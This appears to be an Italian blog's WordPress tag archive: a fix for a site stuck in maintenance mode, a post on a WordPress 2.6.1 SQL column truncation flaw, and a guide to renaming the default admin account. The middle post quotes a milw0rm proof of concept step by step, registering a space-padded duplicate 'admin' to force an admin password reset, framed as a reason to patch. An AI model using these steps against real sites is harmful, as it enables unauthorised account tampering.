logo

Tag Archive for Wordpress

WORDPRESS Sito bloccato in manutenzione

Qualora a seguito di un aggiornamento di WordPress o di qualche suo pluging il sito dovesse rimane permanentemente bloccato sulla inquietante scritta:

“Momentaneamente non disponibile per manutenzione. Riprovare fra un minuto.”

sarà necessario intervenire manualmente per cancellare dal blog, tramite un qualunque programma con protocollo ftp, il file  .maintenance  :


WordPress 2.6.1. QSL Columm T. Vulnerability

Aruba ha recentemente attivato un servizio di newsletter dedicato alla sicurezza, in particolare la prima riferiva che “la versione 2.6.1. di WordPress è esposta al rischio di hacking delle password utente e al reset della password con una password casuale: il sito non viene comunque esposto a rischio di defacement in quanto l’hacker non può conoscere la nuova password, ma è in ogni caso una patch che andrebbe applicata.”

Incuriosito, sono andato sul sito di milx0rm per vedere le ultime novità e, in effetti, qualcosa c’era:

 

  • WordPress 2.6.1. (QSL Columm Truncation Vulnerability) Admin takeover Exploit
  • WordPress 2.6.1. QSL Columm Truncation Vulnerability

In particolare, questo ultimo:

 

milworm.png

 

è quello a cui si riferiva l’articolo, il codice parla da solo:

# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress.com/
#
# this is not critical vuln [;
#
# first, read this discovery:
# http://www.suspekt.org/2008/08/18/
#mysql-and-sql-column-truncation-vulnerabilities/
# in this hack we can remote change admin password,
#if registration enabled
# greets: Stefan Esser, Lukasz Pilorz, 
#cOndemned, tbh, sid.psycho, str0ke and all fiends
1. go to url: server.com/wp-login.php?action=register

2. register as:

login: admin                                                       x
email: your email

^ admin[55 space chars]x

now, we have duplicated 'admin' account in database

3. go to url: server.com/wp-login.php?action=lostpassword

4. write your email into field and submit this form

5. check your email and go to reset confirmation link

6. admin's password changed, but new password will be
 send to correct admin email ;/

# milw0rm.com [2008-09-07]

 

Questa volta, per fortuna, il tutto si conclude solo con un reset della password, e comunque la nuova password viene reinviata all’indirizzo dell’amministratore.

Ricordo che, oltre che ad eseguire sempre gli aggiornamenti (versione 2.6.3), è opportuno cambiare sia il nome dell’amministratore (qui l’articolo) che il prefisso delle tabelle sel vostro MySQL, senza escludere l'ipotesi di iniziare un master in sicurezza informatica(link).

 

 

Cambiare il nome utente Admin in WordPress

Durante l’installazione di WordPress viene attribuita di default la username “admin” a tutti gli amministratori. Tale impostazione non è successivamente modificabile dal pannello di controllo degli utenti.

Immagine 5.png

Avere il nome utente “admin” uguale ad altre migliaia di fortunati possessori di un blog su piattaforma WP agevola di non poco il lavoro di eventuali hackers intenzionati a penetrare il vostro sito. E’ pertanto necessario ovviare appena possibile a questo problema.

Per cambiare la username seguite le seguenti istruzioni:

1) Loggatevi sul vostro phpMyAdmin.

2) Eseguite il Backup del DataBase di WordPress (Esporta).

3) Selezionate la tabella “_user” e poi cliccate su mostra:

Immagine 3.png

4) Selezionate il record relativo l’amministratore ed editatelo (Modifica.)

5) Cambiate, a vostra scelta, il valore della username:

Immagine 4.png

6) Salvate i cambiamenti.

Per finire, per rendere la vostra password veramente “forte”, inseriteci almeno un carattere del tipo !”£$%&/().